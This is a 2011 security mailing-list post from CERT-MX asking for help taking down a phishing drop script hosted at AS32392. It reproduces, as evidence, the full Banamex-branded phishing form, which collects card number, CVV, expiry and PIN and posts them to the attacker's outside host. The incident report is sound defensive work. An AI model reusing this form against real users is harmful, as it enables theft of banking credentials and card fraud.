[nsp-sec] Phishing dropbox at AS32392
David Jiménez
ddavinci at gmail.com
Wed Jul 27 12:24:18 EDT 2011
Hi folks,
We are getting a lot of reports of a phishing scam delivered as an email
attachment. The attached form posts the data it collects to a drop script at
hxxp://asmuhendisler.com/i/templates/beez/css/b/m.php. This domain resolves to
72.41.179.52 at AS32392
AS | IP | AS Name
32392 | 72.41.179.52 | OPENTRANSFER-ECOMMERCE - Ecommerce Corporation
Attached to this message you'll find the evidence.
Is there someone from AS32392 on the list, or anyone who could help track
sessions to this IP and shut down the script on this site?
Kind Regards
--
---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188
EVIDENCE
////////////////////
<title>Banamex.com: BancaNet - Restaurar su cuenta</title>
<body background="http://www.juropnet.hu/~maria/mx.png">
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<script type="text/javascript">
<!--
// copyright 1999 Idocs, Inc. http://www.idocs.com
// Distribute this script freely but keep this notice in place
// Keypress filter: returns true to accept the key and false to reject it.
//   myfield: the input element that received the keypress
//   e:       the event object, used when window.event is not available
//   dec:     optional key into myfield.form.elements; that element gets focus when "." is typed
// The inputs on this page call it as numbersonly(this, event), so dec is undefined there.
function numbersonly(myfield, e, dec)
{
var key;
var keychar;
// take the key code from window.event when it exists, otherwise from the event argument;
// with neither available the key is accepted unfiltered
if (window.event)
key = window.event.keyCode;
else if (e)
key = e.which;
else
return true;
keychar = String.fromCharCode(key);
// control keys (8 backspace, 9 tab, 13 enter, 27 escape) are always accepted
if ((key==null) || (key==0) || (key==8) ||
(key==9) || (key==13) || (key==27) )
return true;
// numbers
else if ((("0123456789").indexOf(keychar) > -1))
return true;
// decimal point jump: move focus to the element named by dec and swallow the "."
else if (dec && (keychar == "."))
{
myfield.form.elements[dec].focus();
return false;
}
else
return false;
}
//-->
</SCRIPT>
<script type="text/javascript">
// Focus-advance helper: when y.length equals x.maxLength, focuses the element of
// form1 at index x.tabIndex, provided that index is below form1's length.
//   x: the input element (read for maxLength and tabIndex)
//   y: a value with a length property; presumably the field's current text, verify against caller
// No call to checkLen appears in the markup captured in this message.
function checkLen(x,y)
{
if (y.length==x.maxLength)
{
var next=x.tabIndex;
if (next<document.getElementById("form1").length)
{
document.getElementById("form1").elements[next].focus();
}
}
}
</script>
<SCRIPT language=Javascript>
// Submit-time check, wired to the "Continuar" button through onClick="return sloboz()".
// For each of the cc, cvv and pin controls of form1 it shows an alert and returns false
// when the value is empty, then compares the control's own .length property with a
// minimum (16, 3, 4). When no check fires it returns true and the browser posts form1
// to the URL in the form's action attribute.
// signupFORM is assigned without var, so it becomes a global.
// NOTE(review): the line breaks inside "return false" and inside two alert strings look
// like mail-wrapping artefacts of this capture; presumably single lines in the original.
// NOTE(review): the accented characters in the alert strings appear mis-encoded here
// (compare "Número" in the form labels); match on the ASCII parts when searching for this page.
function sloboz(){
signupFORM = document.form1;
if(signupFORM.cc.value == ""){
alert("Por favor, introduzca su N˙mero de tarjeta.");return
false;}
if(signupFORM.cc.length <16){
alert("N˙mero de tarjeta no v·lido. Por favor, intÈntelo de
nuevo.");return false;}
if(signupFORM.cvv.value == ""){
alert("Por favor, introduzca su CVV.");return false;}
if(signupFORM.cvv.length <3){
alert("CVV no v·lido. Por favor, intÈntelo de nuevo.");return
false;}
if(signupFORM.pin.value == ""){
alert("Por favor, introduzca su PIN de la tarjeta.");return
false;}
if(signupFORM.pin.length <4){
alert("PIN de la tarjeta no es v·lida. La longitud del PIN de la tarjeta
es de 4 dÌgitos.");return false;}
return true;
}
</SCRIPT>
<form name="form1" method="post" action="
http://asmuhendisler.com/i/templates/beez/css/b/m.php">
<table width="45%">
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"><b><font color="#FF0000">*
</font>Número de tarjeta: </b></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
<input id="cc" type="text" name="cc" value="" maxlength="17"
onKeyPress="return numbersonly(this, event)" size=20 />
</span></font></span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"><b><font color="#FF0000">*
</font>Fecha de caducidad: </b></font></div>
</td>
<td width="60%"><span class="iskierda">
<select name="mm" id="mm" size="1">
<option><font face="Arial"><span style="font-size: 9pt">- Mes
-</span></font></option>
<option value="01"><font face="Arial"><span style="font-size:
9pt">01</span></font></option>
<option value="02"><font face="Arial"><span style="font-size:
9pt">02</span></font></option>
<option value="03"><font face="Arial"><span style="font-size:
9pt">03</span></font></option>
<option value="04"><font face="Arial"><span style="font-size:
9pt">04</span></font></option>
<option value="05"><font face="Arial"><span style="font-size:
9pt">05</span></font></option>
<option value="06"><font face="Arial"><span style="font-size:
9pt">06</span></font></option>
<option value="07"><font face="Arial"><span style="font-size:
9pt">07</span></font></option>
<option value="08"><font face="Arial"><span style="font-size:
9pt">08</span></font></option>
<option value="09"><font face="Arial"><span style="font-size:
9pt">09</span></font></option>
<option value="10"><font face="Arial"><span style="font-size:
9pt">10</span></font></option>
<option value="11"><font face="Arial"><span style="font-size:
9pt">11</span></font></option>
<option value="12"><font face="Arial"><span style="font-size:
9pt">12</span></font></option>
</select>
<select name="yyyy" id="yyyy" size="1">
<option selected><font face="Arial"><span style="font-size: 9pt">-
Ano
-</span></font></option>
<option value="2011"><font face="Arial"><span style="font-size:
9pt">2011
</span></font></option>
<option value="2012"><font face="Arial"><span style="font-size:
9pt">2012
</span></font></option>
<option value="2013"><font face="Arial"><span style="font-size:
9pt">2013
</span></font></option>
<option value="2014"><font face="Arial"><span style="font-size:
9pt">2014
</span></font></option>
<option value="2015"><font face="Arial"><span style="font-size:
9pt">2015
</span></font></option>
<option value="2016"><font face="Arial"><span style="font-size:
9pt">2016
</span></font></option>
<option value="2017"><font face="Arial"><span style="font-size:
9pt">2017
</span></font></option>
<option value="2018"><font face="Arial"><span style="font-size:
9pt">2018
</span></font></option>
<option value="2019"><font face="Arial"><span style="font-size:
9pt">2019
</span></font></option>
<option><font face="Arial"><span style="font-size:
9pt">2020</span></font></option>
</select>
</span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"><b><font color="#FF0000">*
</font>CVV: </b></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
<input id="pin1" name="cvv" value="" maxlength="3"
onKeyPress="return numbersonly(this, event)" size="1" />
</span></font><font size="1" color="#000000"><font size="1"
color="#000000"><b><font size="1" color="#000000"><font size="1"
color="#000000"><b><font size="1" color="#000000"><b><font face="Arial,
Helvetica, sans-serif"><img src="
https://projectbubble.com/static/images/cards-cvv.png"
align="absmiddle"></font></b></font></b></font></font></b>
<font size="1" color="#000000"><font face="Arial, Helvetica,
sans-serif">(número
de verificación de tarjeta de 3
digitos)</font></font></font></font></span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"><b><font color="#FF0000">*
</font>PIN de la Tarjeta: </b></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
<input id="pin0" type="password" name="pin" value="" maxlength="6"
onKeyPress="return numbersonly(this, event)" size="5" />
</span><span class="iskierda"><font size="1" color="#000000"><font
size="1" color="#000000"></font></font></span></font></span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
</span></font></span></td>
</tr>
<tr>
<td width="11%"> </td>
<td width="29%">
<div align="right"><font size="2" face="Arial, Helvetica,
sans-serif"></font></div>
</td>
<td width="60%"><span class="iskierda"><font face="Arial"><span
style="font-size: 9pt">
<input type="submit" class="btn_verde" value="Continuar"
style="color: #FFFFFF; background-color: #339933" name="Submit"
onClick="return sloboz()" >
</span></font></span></td>
</tr>
</table>
</form>
<p> </p>